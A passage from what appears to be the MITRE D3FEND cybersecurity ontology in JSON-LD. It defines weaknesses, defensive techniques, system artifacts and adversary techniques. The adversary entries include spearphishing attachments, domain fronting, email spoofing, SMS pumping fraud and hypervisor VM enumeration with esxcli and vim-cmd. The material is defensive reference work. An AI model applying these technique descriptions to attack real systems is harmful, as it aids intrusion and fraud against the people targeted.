      "d3f:definition": "The information system implements cryptographic mechanisms to protect the confidentiality of nonlocal maintenance and diagnostic communications.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-09-24T00:00:00"
      },
      "rdfs:label": "CCI-003123"
    },
    {
      "@id": "d3f:CWE-1231",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1231",
      "d3f:definition": "The product uses a trusted lock bit for restricting access to registers, address regions, or other resources, but the product does not prevent the value of the lock bit from being modified after it has been set.",
      "rdfs:label": "Improper Prevention of Lock Bit Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:SoftwareInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SoftwareInventory"
      ],
      "d3f:d3fend-id": "D3-SWI",
      "d3f:definition": "Software inventorying identifies and records the software items in the organization's architecture.",
      "d3f:inventories": {
        "@id": "d3f:Software"
      },
      "d3f:kb-article": "## How it works\nAdministrators collect information on software items in their architecture using a variety of administrative and management tools that query network nodes for information.  In limited cases, where such queries are not supported or provide specific information of interest, an administrator may also collect this information through network enumeration methods to determine services responding on network nodes.\n\n## Considerations\n* Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.\n* An adversary conducting network enumeration may engage in activities that parallel normal software inventorying activities, but would require escalating to admin privileges for most of the operations requiting administrative tools.\n\n## Examples\n\nApplication-layer discovery:\n\n* Simple Network Management Protocol (SNMP) collects MIB information\n* Web-based Enterprise Management (WBEM) collects CIM information\n   * Windows Management Instrumentation (WMI)\n   * Windows Management Infrastructure (MI)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Web-BasedEnterpriseManagement"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Infrastructure"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Instrumentation"
        }
      ],
      "d3f:synonym": [
        "Software Discovery",
        "Software Inventorying"
      ],
      "rdfs:label": "Software Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:N55a3cf68b8a043b28c4e36ee7f9bc8a6"
        }
      ]
    },
    {
      "@id": "_:N55a3cf68b8a043b28c4e36ee7f9bc8a6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1566.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1566.001",
      "d3f:definition": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.",
      "d3f:produces": [
        {
          "@id": "d3f:Email"
        },
        {
          "@id": "d3f:InboundInternetMailTraffic"
        }
      ],
      "rdfs:label": "Spearphishing Attachment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1566"
        },
        {
          "@id": "_:Nccef7e43b4b34e51ae4594019e02f8c0"
        },
        {
          "@id": "_:N091f2108f10f4b35af6aab48ec1b305f"
        }
      ]
    },
    {
      "@id": "_:Nccef7e43b4b34e51ae4594019e02f8c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "_:N091f2108f10f4b35af6aab48ec1b305f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetMailTraffic"
      }
    },
    {
      "@id": "d3f:LinuxClone3",
      "@type": "owl:Class",
      "d3f:definition": "Creates a child process and provides more precise control over the data shared between the parent and child processes.\n\nNewer system call.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/clone3.2.html"
      },
      "rdfs:label": "Linux Clone3",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:WindowsRegistryValue",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contained-by": {
        "@id": "d3f:WindowsRegistryKey"
      },
      "d3f:definition": "A Windows Registry Value is a data structure consisting of a name, type, data (as a pointer), and the length. Windows Registry Values are always associated with a Windows Registry Key. They store the actual configuration data for the operating system and the programs that run on the system.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/winreg/ns-winreg-valentw"
      },
      "rdfs:label": "Windows Registry Value",
      "rdfs:seeAlso": [
        {
          "@id": "https://learn.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-registry"
        },
        {
          "@id": "https://schema.ocsf.io/objects/registry_value"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        },
        {
          "@id": "_:Nd7697f01f5ee4d4aaa7b83ef869ef548"
        },
        {
          "@id": "_:N2544377f068640a5931fbffaea18a240"
        }
      ]
    },
    {
      "@id": "_:Nd7697f01f5ee4d4aaa7b83ef869ef548",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contained-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "_:N2544377f068640a5931fbffaea18a240",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:windows-registry-value"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:Reference-WebAuthentication_AnAPIForAccessingPublicKeyCredentialsLevel2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.w3.org/TR/webauthn-2/"
      },
      "d3f:kb-abstract": "This specification defines an API enabling the creation and use of strong, attested, scoped, public key-based credentials by web applications, for the purpose of strongly authenticating users. Conceptually, one or more public key credentials, each scoped to a given WebAuthn Relying Party, are created by and bound to authenticators as requested by the web application. The user agent mediates access to authenticators and their public key credentials in order to preserve user privacy. Authenticators are responsible for ensuring that no operation is performed without user consent. Authenticators provide cryptographic proof of their properties to Relying Parties via attestation. This specification also describes the functional model for WebAuthn conformant authenticators, including their signature and attestation functionality.",
      "d3f:kb-author": "W3C",
      "d3f:kb-reference-of": {
        "@id": "d3f:CredentialTransmissionScoping"
      },
      "d3f:kb-reference-title": "Web Authentication: An API for accessing Public Key Credentials\nLevel 2",
      "rdfs:label": "Reference - Web Authentication: An API for accessing Public Key Credentials\nLevel 2"
    },
    {
      "@id": "d3f:WindowsSetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Sets the context for the specified thread.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtSetThreadContext"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext"
      },
      "rdfs:label": "Windows SetThreadContext",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISetThreadContext"
        },
        {
          "@id": "_:N681619d53fd24af68815caeb5ff0b351"
        }
      ]
    },
    {
      "@id": "_:N681619d53fd24af68815caeb5ff0b351",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtSetThreadContext"
      }
    },
    {
      "@id": "d3f:CWE-98",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-98",
      "d3f:definition": "The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in \"require,\" \"include,\" or similar functions.",
      "d3f:synonym": [
        "Local file inclusion",
        "RFI",
        "Remote file include"
      ],
      "rdfs:label": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-706"
        },
        {
          "@id": "d3f:CWE-829"
        }
      ]
    },
    {
      "@id": "d3f:RegOpenKeyTransactedA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyTransactedA"
    },
    {
      "@id": "d3f:CWE-306",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-306",
      "d3f:definition": "The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.",
      "rdfs:label": "Missing Authentication for Critical Function",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-287"
      }
    },
    {
      "@id": "d3f:T1090.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1090.004",
      "d3f:definition": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetEncryptedWebTraffic"
      },
      "rdfs:label": "Domain Fronting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1090"
        },
        {
          "@id": "_:N91f47070e1a942f0aa37a96b16806b0c"
        }
      ]
    },
    {
      "@id": "_:N91f47070e1a942f0aa37a96b16806b0c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedWebTraffic"
      }
    },
    {
      "@id": "d3f:CWE-267",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-267",
      "d3f:definition": "A particular privilege, role, capability, or right can be used to perform unsafe actions that were not intended, even when it is assigned to the correct entity.",
      "rdfs:label": "Privilege Defined With Unsafe Actions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:T1062",
      "@type": "owl:Class",
      "d3f:attack-id": "T1062",
      "d3f:definition": "**This technique has been deprecated and should no longer be used.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated and should no longer be used.**",
      "rdfs:label": "Hypervisor",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:has-link",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x has-link y: The d3fend analysis x has the link y.",
      "rdfs:label": "has-link",
      "rdfs:range": {
        "@id": "xsd:anyURI"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-data-property"
      }
    },
    {
      "@id": "d3f:ScheduledJobUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an existing scheduled task is updated, altering parameters such as timing, conditions, or actions.",
      "rdfs:label": "Scheduled Job Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ScheduledJobEvent"
        },
        {
          "@id": "_:N6b3dae8d32594c4e96a29d30513ac881"
        }
      ]
    },
    {
      "@id": "_:N6b3dae8d32594c4e96a29d30513ac881",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJobCreationEvent"
      }
    },
    {
      "@id": "d3f:T1564.013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564.013",
      "d3f:definition": "Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It’s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access.",
      "rdfs:label": "Bind Mounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1564"
      }
    },
    {
      "@id": "d3f:T1673",
      "@type": "owl:Class",
      "d3f:attack-id": "T1673",
      "d3f:definition": "An adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list of VMs on an ESXi hypervisor using a [Hypervisor CLI](https://attack.mitre.org/techniques/T1059/012) such as `esxcli` or `vim-cmd` (e.g. `esxcli vm process list or vim-cmd vmsvc/getallvms`).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: TrendMicro Play) Adversaries may also directly leverage a graphical user interface, such as VMware vCenter, in order to view virtual machines on a host.",
      "rdfs:label": "Virtual Machine Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:T1021.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1021.004",
      "d3f:creates": {
        "@id": "d3f:SSHSession"
      },
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.",
      "d3f:produces": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      },
      "rdfs:label": "SSH",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1021"
        },
        {
          "@id": "_:Na4a8c4edd4dd4603a4a8c44e3c796b56"
        },
        {
          "@id": "_:Nbc3accc25c664add996aa92cb7a28a61"
        }
      ]
    },
    {
      "@id": "_:Na4a8c4edd4dd4603a4a8c44e3c796b56",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SSHSession"
      }
    },
    {
      "@id": "_:Nbc3accc25c664add996aa92cb7a28a61",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1589",
      "@type": "owl:Class",
      "d3f:attack-id": "T1589",
      "d3f:definition": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.",
      "rdfs:label": "Gather Victim Identity Information",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:IntegrationTestExecutionTool",
      "@type": "owl:Class",
      "d3f:definition": "An integration test execution tool automatically performs integration testing.  Integration testing (sometimes called integration and testing, abbreviated I&T) is the phase in software testing in which individual software modules are combined and tested as a group.",
      "rdfs:label": "Integration Test Execution Tool",
      "rdfs:seeAlso": {
        "@id": "dbr:Integration_testing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:TestExecutionTool"
      }
    },
    {
      "@id": "d3f:T1474.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1474.001",
      "d3f:definition": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)",
      "rdfs:label": "Compromise Software Dependencies and Development Tools - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1474"
      },
      "skos:prefLabel": "Compromise Software Dependencies and Development Tools"
    },
    {
      "@id": "d3f:GroupDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an existing group is permanently removed from the system, dissolving its associated memberships and privileges.",
      "rdfs:label": "Group Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:GroupManagementEvent"
        },
        {
          "@id": "_:N58742714694e4a69954ff1f096bd981f"
        }
      ]
    },
    {
      "@id": "_:N58742714694e4a69954ff1f096bd981f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupCreationEvent"
      }
    },
    {
      "@id": "d3f:DesktopComputer",
      "@type": "owl:Class",
      "d3f:definition": "A desktop computer is a personal computer designed for regular use at a single location on or near a desk or table due to its size and power requirements. The most common configuration has a case that houses the power supply, motherboard (a printed circuit board with a microprocessor as the central processing unit (CPU), memory, bus, and other electronic components, disk storage (usually one or more hard disk drives, solid state drives, optical disc drives, and in early models a floppy disk drive); a keyboard and mouse for input; and a computer monitor, speakers, and, often, a printer for output. The case may be oriented horizontally or vertically and placed either underneath, beside, or on top of a desk.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Desktop_computer"
      },
      "rdfs:label": "Desktop Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:PersonalComputer"
      }
    },
    {
      "@id": "d3f:DNSEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Domain Name System (DNS), which translates domain names to IP addresses and operates over UDP and TCP.",
      "rdfs:label": "DNS Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/dns_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "_:Nfd37645e76ea4facbafc58228c6795ed"
        },
        {
          "@id": "_:N8162ec6be0d8423e830685d973642fd5"
        }
      ]
    },
    {
      "@id": "_:Nfd37645e76ea4facbafc58228c6795ed",
      "@type": "owl:Class",
      "owl:unionOf": {
        "@list": [
          {
            "@id": "d3f:TCPEvent"
          },
          {
            "@id": "d3f:UDPEvent"
          }
        ]
      }
    },
    {
      "@id": "_:N8162ec6be0d8423e830685d973642fd5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ApplicationLayerFirewall",
      "@type": "owl:Class",
      "d3f:definition": "An application firewall is a form of firewall that controls input, output, and/or access from, to, or by an application or service. It operates by monitoring and potentially blocking the input, output, or system service calls that do not meet the configured policy of the firewall. The application firewall is typically built to control all network traffic on any OSI layer up to the application layer. It is able to control applications or services specifically, unlike a stateful network firewall, which is - without additional software - unable to control network traffic regarding a specific application. There are two primary categories of application firewalls, network-based application firewalls and host-based application firewalls.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Application_firewall"
      },
      "rdfs:label": "Application Layer Firewall",
      "rdfs:subClassOf": {
        "@id": "d3f:Firewall"
      },
      "skos:altLabel": "Application Firewall"
    },
    {
      "@id": "d3f:Maximum-marginLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MML",
      "d3f:definition": "Maximum-margin classifiers attempt to maximize the distance between the given data points and the decision boundary",
      "d3f:kb-article": "## References\nEngelen, S., & Hoos, H. (2020). A survey on semi-supervised learning. Machine Learning, 109(2), 299-337. [Link](https://link.springer.com/article/10.1007/s10994-019-05855-6).\n\nSupport Vector Machines for Machine Learning. [Link](https://machinelearningmastery.com/support-vector-machines-for-machine-learning/#:~:text=The%20distance%20between%20the%20line,called%20the%20Maximal%2DMargin%20hyperplane.)",
      "rdfs:label": "Maximum-margin Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:IntrinsicallySemi-supervisedLearning"
      }
    },
    {
      "@id": "d3f:has-output",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-output y: An event x has output y iff y is an artifact that is present at the end of x, was not present in the same state at the start of x, and whose presence at the end is required for x to be considered complete; the change in state may arise either from a transformation of y itself or from the realization of the information content y bears.",
      "owl:inverseOf": {
        "@id": "d3f:output-of"
      },
      "rdfs:domain": {
        "@id": "d3f:Event"
      },
      "rdfs:label": "has-output",
      "rdfs:range": {
        "@id": "d3f:Artifact"
      },
      "rdfs:seeAlso": [
        {
          "@id": "http://purl.obolibrary.org/obo/RO_0002234"
        },
        {
          "@id": "https://www.commoncoreontologies.org/ont00001986"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:has-participant"
      }
    },
    {
      "@id": "d3f:CWE-785",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-785",
      "d3f:definition": "The product invokes a function for normalizing paths or file names, but it provides an output buffer that is smaller than the maximum possible size, such as PATH_MAX.",
      "rdfs:label": "Use of Path Manipulation Function without Maximum-sized Buffer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-120"
        },
        {
          "@id": "d3f:CWE-676"
        }
      ]
    },
    {
      "@id": "d3f:T1562.010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:LegacySystem"
      },
      "d3f:attack-id": "T1562.010",
      "d3f:definition": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.",
      "rdfs:label": "Downgrade Attack",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N6a528c7bb15e421689e28530d94d5ab3"
        }
      ]
    },
    {
      "@id": "_:N6a528c7bb15e421689e28530d94d5ab3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LegacySystem"
      }
    },
    {
      "@id": "d3f:T1672",
      "@type": "owl:Class",
      "d3f:attack-id": "T1672",
      "d3f:definition": "Adversaries may fake, or spoof, a sender’s identity by modifying the value of relevant email headers in order to establish contact with victims under false pretenses.(Citation: Proofpoint TA427 April 2024) In addition to actual email content, email headers (such as the FROM header, which contains the email address of the sender) may also be modified. Email clients display these headers when emails appear in a victim's inbox, which may cause modified emails to appear as if they were from the spoofed entity.",
      "rdfs:label": "Email Spoofing",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:DNN-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DBC",
      "d3f:definition": "DNNs serve for clustering as mappings to better representations. The features of these representations can be drawn from different layers of the network or even from several layers.",
      "d3f:kb-article": "## References\nOpenReview. (n.d.). Unsupervised Clustering using Pseudo Ensemble Models. [Link](https://openreview.net/pdf?id=B1eT9VMgOX)",
      "rdfs:label": "DNN-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ANN-basedClustering"
      }
    },
    {
      "@id": "d3f:OperatingSystemFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system file is a file that is part of, or used to store information about, the operating system itself.",
      "rdfs:label": "Operating System File",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Operating_system"
        },
        {
          "@id": "dbr:System_file"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:T1496.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1496.003",
      "d3f:definition": "Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)",
      "rdfs:label": "SMS Pumping",
      "rdfs:subClassOf": {
        "@id": "d3f:T1496"
      }
    },
    {
      "@id": "d3f:NTPSymmetricPassiveExchangeEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP peer operating in symmetric passive mode responds to clock synchronization messages initiated by a symmetric active peer, facilitating mutual timekeeping.",
      "rdfs:label": "NTP Symmetric Passive Exchange Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NTPEvent"
        },
        {
          "@id": "_:N51d3420ad7a34901be674b05c4a4e7f6"
        }
      ]
    },
    {
      "@id": "_:N51d3420ad7a34901be674b05c4a4e7f6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NTPSymmetricActiveExchangeEvent"
      }
    },
    {
      "@id": "d3f:FileContentDecompressionChecking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileContentDecompressionChecking"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileContentBlockData"
      },
      "d3f:d3fend-id": "D3-FCDC",
      "d3f:definition": "Checking if compressed or encoded data sections can be successfully decompressed or decoded. Can follow with further analysis with semantic knowledge",
      "d3f:kb-article": "## How it works\n\nSome file formats such as JPEGs include encoded or compressed sections. This technique verfies that those expected sections are present and can be properly decoded according to the spec.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CarvingContiguousandFragmentedFilesWithFastObjectValidation"
        },
        {
          "@id": "d3f:Reference-GatheringEvidenceModel-DrivenSoftwareEngineeringinAutomatedDigitalForensics"
        }
      ],
      "rdfs:label": "File Content Decompression Checking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileFormatVerification"
        },
        {
          "@id": "_:N25c8482ea3634ed595a81d1ff86cb20e"
        }
      ]
    },
    {
      "@id": "_:N25c8482ea3634ed595a81d1ff86cb20e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileContentBlockData"
      }
    },
    {
      "@id": "d3f:DHCPService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A DHCP service assigns IP address and modifies network configurations.",
      "d3f:may-produce": {
        "@id": "d3f:DHCPNetworkTraffic"
      },
      "rdfs:label": "DHCP Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkService"
        },
        {
          "@id": "_:Nbba0018376924b34868934def55f6525"
        }
      ]
    },
    {
      "@id": "_:Nbba0018376924b34868934def55f6525",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPNetworkTraffic"
      }
    },
    {
      "@id": "d3f:OTModifyDeviceConfigurationCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Modify device configuration.",
      "rdfs:label": "OT Modify Device Configuration Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceConfigurationCommandEvent"
        },
        {
          "@id": "_:N8c05038731d24f9bbb8d3c0a875bcfbe"
        }
      ]
    },
    {
      "@id": "_:N8c05038731d24f9bbb8d3c0a875bcfbe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTModifyDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:OSAPIWriteMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that writes data into the memory space of another process or into specific regions of memory.",
      "d3f:invokes": {
        "@id": "d3f:WriteMemory"
      },
      "rdfs:label": "OS API Write Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N2535f5a0437c46328297dace5534bf64"
        }
      ]
    },
    {
      "@id": "_:N2535f5a0437c46328297dace5534bf64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WriteMemory"
      }
    },
    {
      "@id": "d3f:Proxy-basedWebServerAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Proxy-basedWebServerAccessMediation"
      ],
      "d3f:d3fend-id": "D3-PBWSAM",
      "d3f:definition": "Proxy-based web server access mediation focuses on the regulation of web server access through intermediary proxy servers.",
      "d3f:kb-article": "## How it works\n\nProxy-based Web Server Access Mediation involves controlling access to web servers via proxy servers, which act as intermediaries between users and web resources. This approach can enhance security by anonymizing user requests, filtering content, and enforcing access policies. Examples include using corporate proxies to access external websites or services.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-41-Revision-1"
      },
      "rdfs:label": "Proxy-based Web Server Access Mediation",
      "rdfs:subClassOf": {
        "@id": "d3f:WebSessionAccessMediation"
      }
    },
    {
      "@id": "d3f:T1584.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.003",
      "d3f:definition": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)",
      "rdfs:label": "Virtual Private Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:WirelessLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A physical link that transmits signals through free space or an unguided medium without physical connectors between endpoints. The signal propagates through air, vacuum, water, or other natural media using electromagnetic waves or acoustic energy.",
      "rdfs:label": "Wireless Link",
      "rdfs:subClassOf": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "d3f:T1556.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1556.002",
      "d3f:creates": {
        "@id": "d3f:SharedLibraryFile"
